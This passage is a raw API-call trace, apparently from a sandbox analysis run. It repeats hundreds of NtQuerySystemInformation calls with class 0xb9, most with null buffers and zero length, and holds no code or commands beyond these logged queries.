SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbf0, Length=0x40, ResultLength=0x0) [0200.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 